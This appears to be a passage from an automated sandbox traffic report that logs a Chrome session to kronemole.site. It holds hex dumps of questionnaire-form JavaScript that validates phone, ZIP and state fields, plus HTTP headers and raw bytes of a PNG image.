69 75 73 3d 22 22 3b 0a 09 09 09 09 09 09 69 6e 70 75 74 5f 64 6f 75 62 6c 65 3d 22
                                                                          Data Ascii: maxlength="3" ></div>`+btn+` </div>`;$('#questionBody').append(input);break;case "12":if(data.questions_type_id!='2'){input_alone="input_alone";input_radius="";input_double="
                                                                          2023-11-21 16:58:41 UTC632INData Raw: 6c 61 63 65 68 6f 6c 64 65 72 3d 22 60 2b 76 2e 74 65 78 74 2b 60 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 2d 64 61 74 61 55 20 60 2b 69 6e 70 75 74 5f 72 61 64 69 75 73 2b 60 22 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 60 2b 62 74 6e 2b 60 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 60 3b 0a 09 09 09 09 09 24 28 27 23 71 75 65 73 74 69 6f 6e 42 6f 64 79 27 29 2e 61 70 70 65 6e 64 28 69 6e 70 75 74 29 3b 0a 09 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 09 09 0a 09 09 09 09 63 61 73 65 20 22 31 34 22 3a 0a 09 09 09 09 09 09 69 66 28 64 61 74 61 2e 71 75 65 73 74 69 6f 6e 73 5f 74 79 70 65 5f 69 64 21 3d 27 32 27 29 7b 0a 09 09 09 09 09 09 09 69 6e 70 75 74 5f 61 6c 6f 6e 65 3d 22 69 6e 70 75 74 5f 61 6c 6f 6e 65 22 3b 0a 09 09 09 09 09 09 09 69 6e 70 75 74 5f
                                                                          Data Ascii: laceholder="`+v.text+`" class="input-dataU `+input_radius+`"></div>`+btn+`</div>`;$('#questionBody').append(input);break;case "14":if(data.questions_type_id!='2'){input_alone="input_alone";input_
                                                                          2023-11-21 16:58:41 UTC650INData Raw: 6e 64 28 60 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 61 6e 73 77 65 72 4f 70 74 69 6f 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 75 74 74 6f 6e 20 62 74 6e 2d 74 78 20 62 68 2d 63 6f 6c 6f 72 20 62 74 78 68 2d 63 6f 6c 6f 72 22 20 6f 6e 43 6c 69 63 6b 3d 22 76 61 6c 69 64 61 74 65 44 61 74 61 28 5b 60 2b 61 6e 73 77 65 72 73 2b 60 5d 2c 20 66 61 6c 73 65 2c 74 72 75 65 29 22 3e 60 2b 24 28 27 23 73 75 62 6d 69 74 2d 6c 61 6e 67 27 29 2e 76 61 6c 28 29 2b 60 3c 2f 62 75 74 74 6f 6e 3e 60 29 3b 0a 09 09 7d 0a 09 7d 0a 09 69 66 28 64 61 74 61 2e 74 65 78 74 5f 64 69 73 63 6c 61 69 6d 65 72 21 3d 22 22 20 26 26 20 64 61 74 61 2e 74 65 78 74 5f 64 69 73 63 6c 61 69 6d 65 72 21 3d 6e 75 6c 6c 29 7b 0a 09 09 24 28 27 23 71 75 65 73 74 69 6f 6e 42 6f 64 79
                                                                          Data Ascii: nd(`<button class="answerOption btn-primary button btn-tx bh-color btxh-color" onClick="validateData([`+answers+`], false,true)">`+$('#submit-lang').val()+`</button>`);}}if(data.text_disclaimer!="" && data.text_disclaimer!=null){$('#questionBody
                                                                          2023-11-21 16:58:41 UTC654INData Raw: 63 61 73 65 20 32 3a 0a 09 09 09 09 76 61 72 20 70 68 6f 6e 65 3d 24 28 27 23 70 68 6f 6e 65 2d 64 61 74 61 55 27 29 2e 76 61 6c 28 29 3b 0a 09 09 09 09 69 66 28 70 68 6f 6e 65 2e 6c 65 6e 67 74 68 3d 3d 31 32 20 26 26 20 70 68 6f 6e 65 21 3d 27 78 78 78 2d 78 78 78 2d 78 78 78 78 27 29 7b 0a 09 09 09 09 09 24 28 27 23 70 68 6f 6e 65 2d 64 61 74 61 55 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 6f 72 6d 62 61 64 22 29 3b 0a 09 09 09 09 09 24 28 27 23 70 68 6f 6e 65 2d 64 61 74 61 55 27 29 2e 61 74 74 72 28 22 64 61 74 61 22 2c 22 74 72 75 65 22 29 3b 0a 09 09 09 09 09 24 28 22 23 72 65 64 32 22 29 2e 63 73 73 28 7b 22 64 69 73 70 6c 61 79 22 3a 22 6e 6f 6e 65 22 7d 29 3b 0a 09 09 09 09 09 24 28 22 23 70 68 6f 6e 65 2d 64 61 74 61 2d 62 74 6e 55 22
                                                                          Data Ascii: case 2:var phone=$('#phone-dataU').val();if(phone.length==12 && phone!='xxx-xxx-xxxx'){$('#phone-dataU').removeClass("formbad");$('#phone-dataU').attr("data","true");$("#red2").css({"display":"none"});$("#phone-data-btnU"
                                                                          2023-11-21 16:58:41 UTC656INData Raw: 31 63 66 36 0d 0a 20 22 61 63 63 65 70 74 65 64 22 3a 20 74 72 75 65 7d 0a 09 09 09 09 09 09 2f 2f 6c 65 61 64 67 65 6e 46 6f 72 6d 28 64 61 74 61 29 2e 74 68 65 6e 28 28 64 61 74 61 29 20 3d 3e 20 7b 0a 09 09 09 09 09 09 09 6c 65 74 20 61 72 67 73 20 3d 20 7b 20 27 61 49 64 27 3a 72 69 64 2c 20 27 72 65 67 27 3a 74 72 75 65 2c 20 27 72 76 61 6c 27 3a 7a 69 70 20 7d 3b 0a 09 09 09 09 09 09 09 6e 65 78 74 51 75 65 73 74 69 6f 6e 55 28 61 72 67 73 29 3b 0a 09 09 09 09 09 09 2f 2f 7d 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 09 72 65 74 75 72 6e 20 5b 74 72 75 65 2c 20 61 6e 73 77 65 72 56 61 6c 75 65 3d 7a 69 70 5d 3b 0a 09 09 09 09 7d 65 6c 73 65 7b 0a 09 09 09 09 09 24 28 22 23 7a 69 70 2d 64 61 74 61 55 22 29 2e 61 64 64 43 6c 61 73 73 28 22 66 6f 72 6d
                                                                          Data Ascii: 1cf6 "accepted": true}//leadgenForm(data).then((data) => {let args = { 'aId':rid, 'reg':true, 'rval':zip };nextQuestionU(args);//});}return [true, answerValue=zip];}else{$("#zip-dataU").addClass("form
                                                                          2023-11-21 16:58:41 UTC660INData Raw: 0a 09 09 09 09 7d 0a 09 09 09 62 72 65 61 6b 3b 0a 09 09 09 63 61 73 65 20 31 36 3a 0a 09 09 09 09 76 61 72 20 73 74 61 74 65 3d 20 24 28 22 73 65 6c 65 63 74 2e 73 74 61 74 65 22 29 2e 63 68 69 6c 64 72 65 6e 28 22 6f 70 74 69 6f 6e 3a 73 65 6c 65 63 74 65 64 22 29 2e 76 61 6c 28 29 3b 0a 09 09 09 09 69 66 28 73 74 61 74 65 21 3d 22 22 20 26 26 20 73 74 61 74 65 21 3d 22 53 74 61 74 65 22 29 7b 0a 09 09 09 09 09 24 28 22 23 73 74 61 74 65 2d 64 61 74 61 55 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 66 6f 72 6d 62 61 64 22 29 3b 0a 09 09 09 09 09 69 66 28 73 65 6e 64 29 7b 0a 09 09 09 09 09 09 76 61 72 20 64 61 74 61 20 3d 20 7b 22 74 72 61 63 6b 69 6e 67 47 75 69 64 22 3a 20 24 28 27 23 74 72 61 63 6b 69 6e 67 47 75 69 64 27 29 2e 76 61 6c 28 29 2c
                                                                          Data Ascii: }break;case 16:var state= $("select.state").children("option:selected").val();if(state!="" && state!="State"){$("#state-dataU").removeClass("formbad");if(send){var data = {"trackingGuid": $('#trackingGuid').val(),
                                                                          2023-11-21 16:58:41 UTC663INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.449757104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:41 UTC476OUTGET /uploads/archive/company/1080/images/INES-wt.png HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a
                                                                          2023-11-21 16:58:41 UTC617INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:41 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 26027
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:41 GMT
                                                                          last-modified: Tue, 14 Nov 2023 14:49:39 GMT
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          vary: User-Agent
                                                                          CF-Cache-Status: MISS
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zJzQFMjrnm7pApGFbe14Ja4HVtPdzOZHcvfsN%2FUfE5lxRfTVPuOygJZi8QnUaEksYNnzfWkz6JH8Fir8jz1MrtmkefR%2BeNh%2BCkDr9TUzcTnGUL57%2BAOk0sety5JBKEkPrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7a978925082b-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:41 UTC618INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 01 ab 08 06 00 00 00 d0 08 6e 30 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 f1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 38 38 2c 20 32 30 32 30 2f 30 37 2f 31 30 2d 32 32 3a 30 36 3a 35 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                          Data Ascii: PNGIHDRn0pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RD
                                                                          2023-11-21 16:58:41 UTC619INData Raw: 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 73 54 79 70 65 2f 52 65 73 6f 75 72 63 65 45 76 65 6e 74 23 22 20 78 6d 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 30 20 28 57 69 6e 64 6f 77 73 29 22 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 32 33 2d 31 31 2d 31 34 54 32 30 3a 32 30 3a 33 30 2b 30 35 3a 33 30 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 33 2d 31 31 2d 31 34 54 32 30 3a 32 33 3a 34 39 2b 30 35 3a 33 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 33 2d 31 31 2d 31 34 54 32 30 3a 32 33 3a 34 39 2b 30 35 3a 33 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d
                                                                          Data Ascii: be.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Windows)" xmp:CreateDate="2023-11-14T20:20:30+05:30" xmp:ModifyDate="2023-11-14T20:23:49+05:30" xmp:MetadataDate="2023-11-14T20:23:49+05:30" dc:format="image/png" photoshop:ColorM
                                                                          2023-11-21 16:58:41 UTC621INData Raw: 92 24 49 92 54 7c bd 89 65 7d f7 92 5e 78 45 fd 58 57 11 fd b4 16 73 18 94 14 67 60 49 92 24 49 92 54 6c 73 03 97 02 cb 65 7c 1e 63 81 13 81 c3 80 6f 1c 16 35 93 01 96 24 49 92 24 49 c5 35 14 38 17 98 31 47 e7 f4 2c b0 2d f0 a8 c3 a3 66 71 09 a1 24 49 92 24 49 c5 33 0d 70 21 d1 7b 6a c6 9c 9d db c2 c0 70 a2 c9 fb d4 0e 95 9a c1 19 58 92 24 49 92 24 15 4b 7f e0 3a e0 7f 0b 70 ae 2f 01 5b 13 81 96 d4 65 ce c0 92 24 49 92 24 a9 38 d6 02 1e a7 18 e1 15 c0 7c c0 03 c0 b1 c0 14 0e 9f ba ca 19 58 92 24 49 92 24 15 e0 fd 3b b0 1f 70 34 c5 9d 8c f2 28 b0 19 f0 b2 c3 a9 4e 3f 01 0c b0 24 49 92 24 49 ca b5 e9 88 7e 57 eb 97 e0 5a 3e 03 76 21 76 4d 94 1a 66 80 25 49 92 24 49 52 7e 2d 40 f4 bb 5a b0 64 d7 75 35 f0 5b 60 94 43 ac 46 18 60 49 92 24 49 92 94 4f 83 81 cb
                                                                          Data Ascii: $IT|e}^xEXWsg`I$ITlse|co5$I$I581G,-fq$I$I3p!{jpX$I$K:p/[e$I$8|X$I$;p4(N?$I$I~WZ>v!vMf%I$IR~-@Zdu5[`CF`I$IO
                                                                          2023-11-21 16:58:41 UTC624INData Raw: d4 00 4b 92 24 49 92 54 61 bd 80 73 81 6d 33 3c 87 1a f0 3c b0 6f 89 ea da 97 08 05 67 a7 b8 b3 b1 c6 00 bf 26 66 c5 29 63 3d 2d 81 24 49 92 24 a9 a2 fa 00 57 90 7d 78 75 17 e5 0a af 20 76 4d dc 01 f8 47 fd 1a 8b 7c 7f fc c6 a7 4a f6 9c 81 25 49 92 24 49 aa a2 69 80 6b 89 86 dd 59 a9 01 a7 53 fe 65 6a 6b 13 61 d6 e0 82 9e ff 04 60 7f e0 78 9f 36 d9 e9 6d 09 24 49 92 24 49 15 d3 17 b8 11 58 39 c3 73 b8 86 e8 13 f5 62 05 ea 7d 2b b1 44 72 74 bd f6 45 5b 52 d8 03 f8 23 30 33 d1 60 df 99 40 59 0c 82 33 b0 24 49 92 24 49 15 32 23 70 1b b0 4c 46 c7 af 01 a3 80 3d 80 8f 2b 58 ff 53 81 fe 14 b7 2f d6 d9 c0 2e c0 78 9f 4a e9 32 c0 92 24 49 92 24 55 45 3f 62 b9 de a2 19 1d bf 06 bc 4e 04 20 55 f6 3b 60 25 8a 1b 62 5d 0f 6c 0a 7c e3 53 2a 3d 06 58 92 24 49 92 a4 2a
                                                                          Data Ascii: K$ITasm3<<og&f)c=-$I$W}xu vMG|J%I$IikYSejka`x6m$I$IX9sb}+DrtE[R#03`@Y3$I$I2#pLF=+XS/.xJ2$I$UE?bN U;`%b]l|S*=X$I*
                                                                          2023-11-21 16:58:41 UTC625INData Raw: 57 00 3b 01 a3 1c 86 4a 3b 0f 98 95 e2 84 58 5f 02 6b 01 0f 56 75 c0 7a 7a cf 4a 92 24 49 92 52 b4 26 b1 1c 2a 8b f0 ea af c0 f6 18 5e 09 b6 03 de 24 82 d4 22 98 16 b8 19 f8 59 55 07 cc 19 58 92 24 49 92 a4 b4 ac 0d 5c 0b 4c 95 f2 71 6b c0 87 c0 0e 44 4f 21 a9 d5 59 c0 1c 14 67 26 d6 28 60 15 60 44 d5 06 ca 19 58 92 24 49 92 a4 34 ac 0b 5c 47 36 e1 d5 db c0 36 18 5e e9 87 76 02 46 52 9c 99 58 33 00 b7 03 0b 57 6d a0 0c b0 24 49 92 24 49 49 db 98 08 af a6 4c f9 b8 35 e0 15 62 e6 95 d4 9e bd 88 dd 28 8b 12 62 fd 18 b8 17 58 b0 4a 83 64 80 25 49 92 24 49 4a d2 56 c0 65 c4 ee 6f 69 aa 01 cf 11 bb 0d 4a 1d d9 1b 78 86 e2 84 58 b3 02 77 02 3f ad ca 00 19 60 49 92 24 49 92 92 b2 3d 70 3e d0 2b e5 e3 d6 88 1e 41 fb 3b 04 ea 84 03 81 a7 28 4e 88 35 07 70 17 30 7b
                                                                          Data Ascii: W;J;X_kVuzzJ$IR&*^$"YUX$I\LqkDO!Yg&(``DX$I4\G66^vFRX3Wm$I$IIL5b(bXJd%I$IJVeoiJxXw?`I$I=p>+A;(N5p0{
                                                                          2023-11-21 16:58:41 UTC627INData Raw: 49 24 15 60 cd 56 ff a1 f8 1b 62 17 c1 22 f9 16 f8 0b b1 85 ec 47 3e 9f 24 49 92 24 95 c4 3e 64 33 8b e2 52 62 35 ce 18 87 40 fa 81 6d 81 f5 c8 7f 88 f5 15 b0 32 f0 70 56 27 d0 ec 00 ab 07 91 1e 9e 04 cc 5c f0 9b e8 7d 62 3a df 0d 3e 9f 24 49 92 24 15 dc ef 88 dd cf d2 66 78 25 35 f6 fc 5c 89 fc 87 58 ef 02 3f 07 5e cb e2 e0 cd dc f5 6f 21 e0 21 e0 22 8a 1f 5e 01 cc 0a 5c 0f 5c 40 76 cd e6 25 49 92 24 a9 19 6f 8e 0d af a4 fc 3a 09 18 01 d4 72 7e 9e fd ea e7 38 7d 16 07 6f d6 0c ac 2d 81 33 81 69 4b 7a 33 3d 45 ec 9e f8 9a cf 2b 49 92 24 49 05 b2 1b 70 2a b1 5a 26 4d 86 57 52 e7 1d 47 4c 0e ca fb 4c ac 3b 80 75 80 71 69 1e b4 bb 33 b0 fa 02 97 10 b3 ae a6 2d f1 4d b4 18 b1 ce f3 e7 3e 9f 24 49 92 24 15 c4 76 64 13 5e 5d 0c 6c 83 e1 95 d4 59 fb 03 6f 92 ff
                                                                          Data Ascii: I$`Vb"G>$I$>d3Rb5@m2pV'\}b:>$I$fx%5\X?^o!!"^\\@v%I$o:r~8}o-3iKz3=E+I$Ip*Z&MWRGLL;uqi3-M>$I$vd^]lYo
                                                                          2023-11-21 16:58:41 UTC628INData Raw: 33 b0 5e fd 0b 22 e4 bb 13 b8 01 f8 1b 36 88 57 f9 cc 0f dc 91 c1 cf 85 6b 80 5d 30 bc 92 8a 62 37 62 79 71 9e 77 26 3c 8b 98 4d fd 6a 77 5e 30 b5 65 15 c7 bf 5b 66 af ff 63 a3 72 99 11 38 b2 e2 35 30 c0 92 a4 e6 f9 29 70 34 b1 3b df fd c4 4c 5f c3 ab ce e9 5f af db ed 44 0f ad 4b 81 0d 80 69 2c 8d 4a 60 20 11 cc f6 4b f9 b8 d7 01 7b 91 ff 19 1d 92 be 33 9a 98 70 51 cb f1 39 ce 00 5c 49 cc 36 ef 92 b6 02 ac e9 80 a5 1c ff 6e 33 04 2c a7 ed 89 06 9a 55 65 80 25 49 dd d3 9b 98 3d 74 3b 30 12 38 10 98 c3 b2 34 ed 85 f1 af 89 99 23 ef 02 17 01 ab 01 bd 2c 8d 0a 68 3e e0 3e e0 27 29 1f f7 06 22 bc 7a d3 21 90 0a e7 19 62 d7 bf 3c 87 58 4b 03 87 74 f5 2f b7 15 60 fd 8c 6e 24 62 fa af 65 2d 41 29 f5 04 4e a1 ba 41 8e 01 96 24 75 4d 5f 60 77 e0 25 62 76 c3 1a b4
                                                                          Data Ascii: 3^"6Wk]0b7byqw&<Mjw^0e[fcr850)p4;L__DKi,J` K{3pQ9\I6n3,Ue%I=t;084#,h>>')"z!b<XKt/`n$be-A)NA$uM_`w%bv
                                                                          2023-11-21 16:58:41 UTC629INData Raw: 80 f5 ae cf 9b a6 79 cf 12 54 4a 0f e0 4f 94 bb b7 9c 01 96 a4 aa fd 5c 3f 01 f8 2b 2e 19 d4 0f 7d 45 2c 27 95 1a b1 3f f0 fb 94 8f 59 23 76 1e ab 59 fe cc 0c 02 5a 80 cb 80 c5 2d 47 87 1e 4b 61 3c 06 36 e1 71 66 48 f8 3c 1f 49 f8 f1 1f 06 fe 91 d3 9f 0d 3d 81 63 27 f7 3f 27 35 d2 e7 4d 53 7c 09 bc 65 19 2a 67 49 22 35 2e f3 9b 39 49 aa 82 5e c0 5f 80 bd 2d 85 da 71 05 f0 89 65 50 03 76 99 dc 1b b2 84 d4 88 1d f2 fe 6a f9 73 61 05 62 19 e7 22 96 62 b2 8a d0 07 2b 8d d9 74 23 52 38 c6 d1 e4 77 c5 d8 2f 89 dd 52 7f a0 ad 00 eb 25 9f 37 4d 31 12 77 21 ac aa 63 48 3e 95 cf 8a 01 96 a4 2a e8 43 84 13 db 5a 0a 4d c6 d9 96 40 0d d8 0a 38 2d e5 63 d6 88 dd f0 ce b7 fc b9 b2 02 70 3a 30 8b a5 68 d7 2b 24 b7 74 ae d5 80 26 fc fd 24 77 20 4c b2 ff d5 a4 4e 26 bf 33
                                                                          Data Ascii: yTJO\?+.}E,'?Y#vYZ-GKa<6qfH<I=c'?'5MS|e*gI"5.9I^_-qePvjsab"b+t#R8w/R%7M1w!cH>*CZM@8-cp:0h+$t&$w LN&3
                                                                          2023-11-21 16:58:41 UTC631INData Raw: 03 56 4d f9 b8 37 00 7b 01 a3 1c 82 d4 fd 09 98 ad fe eb 24 c3 8b 45 db f9 f3 17 80 d3 ba f8 98 fd 81 96 84 eb f3 00 f0 64 42 8f fd 7c c2 e7 de d9 86 ec 49 2e f5 cc 4b ff ab 89 3d 02 6c 96 e1 f1 17 24 3e 2c e8 0f bc d7 fa 87 8d 4e 81 3b 0c 58 17 58 c8 9f 61 3f 30 81 58 16 f6 85 a5 50 83 76 24 fa 68 fc cb 52 48 52 6a 36 20 96 84 48 9d f5 67 5c 8d a0 f8 10 ef 9c fa cf 92 34 dd 40 84 57 6f 3a 04 99 39 04 58 2e e1 63 2c d0 ce 9f 9f db 8d c7 3c 80 e4 03 ac 8f 81 3d 12 7c fc 57 49 2e 38 ec ca 0c ac a4 8c cd e1 73 fc a9 1c 9c c3 34 c0 8f 99 28 c0 ea d9 e0 5f fc 06 d7 5b b7 e7 74 62 f7 11 a9 51 bd 88 4f 73 8a 38 9b c9 19 58 92 8a 68 7a e0 54 cb a0 2e be a9 38 cf 32 88 d8 fc 21 ed 9d ff 6e 22 56 c1 bc 6a f9 33 77 6d c2 8f 3f 95 25 6e 53 92 cb ea 3a db d6 65 be 04
                                                                          Data Ascii: VM7{$EdB|I.K=l$>,N;XXa?0XPv$hRHRj6 Hg\4@Wo:9X.c,<=|WI.8s4(_[tbQOs8XhzT.82!n"Vj3wm?%nS:e
                                                                          2023-11-21 16:58:41 UTC636INData Raw: 5a ee c9 7a 3b c1 31 9e 9c 79 13 3a ee 78 e0 95 1c d5 77 10 e9 2e a3 6e 75 1f 70 54 67 7e 70 a7 e1 93 fa 9b f2 a5 89 19 4e 47 02 0f 13 cb f5 b2 f0 2a b1 3c 70 1d 62 96 d8 41 c0 4b fe 4c 50 4e 2c 05 6c 91 d3 73 33 c0 92 94 67 ab 00 b3 59 06 75 d1 df 81 a7 2c 43 65 9c 0c 6c 92 f2 31 6f 00 f6 22 96 aa 2a ff 36 07 2e 20 66 60 25 cd fe 57 1d 4b aa 0f d6 54 1d fc ff a4 42 9d bc 6d 12 b7 07 e9 cf be 7a 0f f8 35 9d c8 85 b2 68 ce f5 2c d1 9c eb 50 62 8d e5 4a 44 da f7 bf c0 a2 40 bf 04 7e 18 3c 53 7f 41 f2 38 70 37 86 55 ca bf e3 ea 2f 72 f2 b6 fc d6 00 4b 52 9e fd da 12 a8 1b 9c 7d 55 1d 47 03 bb a7 7c cc 9b 80 fd 71 99 58 de f5 07 56 07 7e 45 f4 a7 1d 94 d2 71 9f b1 f4 1d 4a 72 b9 dd 00 da 0f 94 66 4a e8 98 79 5a 9d 76 14 d1 0f 30 4d e3 89 49 1b 9d fa 99 d8 3b
                                                                          Data Ascii: Zz;1y:xw.nupTg~pNG*<pbAKLPN,ls3gYu,Cel1o"*6. f`%WKTBmz5h,PbJD@~<SA8p7U/rKR}UG|qXV~EqJrfJyZv0MI;
                                                                          2023-11-21 16:58:41 UTC638INData Raw: 39 24 b7 93 95 b2 b1 43 fd 4d 5a 9a 6a c0 71 44 53 69 a9 11 0f e0 6c bd 66 78 22 81 c7 ec 49 34 6e 6f 35 57 02 c7 78 35 83 5a 9d 4a fa b3 52 ef 04 f6 26 a1 41 92 54 2c 33 01 87 5a 06 49 02 60 61 4b d0 69 a7 90 ff de 4f 77 12 fd b1 56 04 ee 6f f2 63 7f 03 5c e0 6d 50 2a eb 01 67 a4 7c cc 1a b1 5c 71 b8 e5 57 83 1e 22 66 5e bd 6e 29 ba 2d 89 65 78 83 f8 ae ef 55 1f 92 e9 17 9e 76 ff ab e3 ea ef 1d d3 f4 6f a2 ef 55 22 3b fc 76 34 28 db d4 5f e4 a8 f1 27 d2 2a 96 41 29 d8 85 d8 76 f7 29 4b 21 a9 e2 e6 b1 04 9d f2 25 70 66 81 ce f7 01 e0 97 44 c3 f7 63 81 45 9b f0 98 d7 90 cc f2 13 65 63 69 a2 69 7b 9a 3d 42 6b c0 b5 c0 ad 96 5f 0d 7a 88 98 21 f8 b0 a5 68 da fb ee e1 34 7f 97 c0 01 c0 08 92 db 81 30 cd fe 57 bb 12 9b a6 a4 b9 74 f0 63 a2 3d c1 a7 49 1d a0 a3
                                                                          Data Ascii: 9$CMZjqDSilfx"I4no5Wx5ZJR&AT,3ZI`aKiOwVoc\mP*g|\qW"f^n)-exUvoU";v4(_'*A)v)K!%pfDcEecii{=Bk_z!h40Wtc=I
                                                                          2023-11-21 16:58:41 UTC639INData Raw: 54 72 06 58 c9 5b 1c 38 93 58 02 f1 10 31 3b a5 9f 65 51 82 36 01 0e 4e f9 98 35 62 d9 e0 28 cb 2f 15 ce eb c4 ee b3 79 d4 cc 06 ee 07 11 9b 76 b5 14 70 8c 7e 03 9c 4b 13 f2 27 03 2c a9 bc 4e 00 a6 b7 0c 92 4a cc 00 2b 3d 3d 81 65 89 19 be 6f 02 f7 10 61 d6 82 96 46 4d b4 3c d1 3c 3d cd 59 e4 35 62 07 e7 67 2c bf 54 58 cf e7 f4 bc 9a d5 64 fe 37 c0 2f 28 66 78 d5 6a 3b 62 69 78 b7 32 a8 de de eb 52 69 f5 23 7a 99 1c 64 29 a4 a6 5b 12 38 a9 e2 35 38 98 ec 03 a4 af bd 15 33 d1 0b 58 b9 fe 05 f0 1e f0 00 70 37 b1 63 dc 3b 96 48 5d 30 2f 70 2d 30 65 8a c7 ac 01 37 02 77 5a 7e a9 d0 1e 23 9a 86 e7 cd 93 4d 78 8c f5 81 5f 51 ec f0 aa d5 b6 c4 07 14 bf 01 c6 77 e5 01 0c b0 a4 72 db 9b f8 24 f3 45 4b 21 35 d5 82 38 f3 e4 48 b2 0f b0 3e f3 56 cc 85 d9 88 9e 59 1b
                                                                          Data Ascii: TrX[8X1;eQ6N5b(/yvp~K',NJ+==eoaFM<<=Y5bg,TXd7/(fxj;bix2Ri#zd)[8583Xp7c;H]0/p-0e7wZ~#Mx_Qwr$EK!58H>VY
                                                                          2023-11-21 16:58:41 UTC640INData Raw: 67 29 9a ae 07 70 09 d1 48 3f 4d 35 e2 43 b9 31 0e 81 54 79 4f 66 74 dc 57 db f9 f3 d3 81 d9 a9 ce 8e 83 2f 01 bf a4 c9 e1 15 18 60 49 0a 07 01 73 37 f0 7d be 39 94 94 57 2f 90 dd 92 01 15 d3 f4 c0 b5 c0 1e 96 a2 a9 f6 20 5a 14 a4 6d 84 3f 03 24 d5 3d 96 a3 e3 1e 07 cc 43 75 c2 ab 57 81 d5 48 20 bc 02 03 2c 49 61 6a e0 d8 06 be 6f bc a5 92 94 63 e7 59 02 75 52 0f e0 94 06 ff 0d 54 c7 16 06 8e ce e0 b8 37 00 47 59 7e 49 75 59 f5 c1 9a b4 ff d5 30 60 21 aa 13 5e bd 46 2c 1b 7c 2d a9 03 18 60 49 6a b5 09 31 d5 73 72 9c 81 25 29 cf ae 00 46 59 06 75 c1 fe c4 ce 50 3d 2c 45 97 4d 09 5c 46 7c 28 96 a6 1a b1 64 d1 a5 83 92 5a bd 9b c1 cf 84 49 1b b8 ff 0e 58 82 ea 84 57 af d7 df 4b be 9a e4 41 0c b0 24 4d ec 4f 40 ef c9 fc 7f 03 2c 49 79 f6 15 d1 24 55 ea 8a dd
                                                                          Data Ascii: g)pH?M5C1TyOftW/`Is7}9W/ Zm?$=CuWH ,IajocYuRT7GY~IuY0`!^F,|-`Ij1sr%)FYuP=,EM\F|(dZIXWKA$MO@,Iy$U
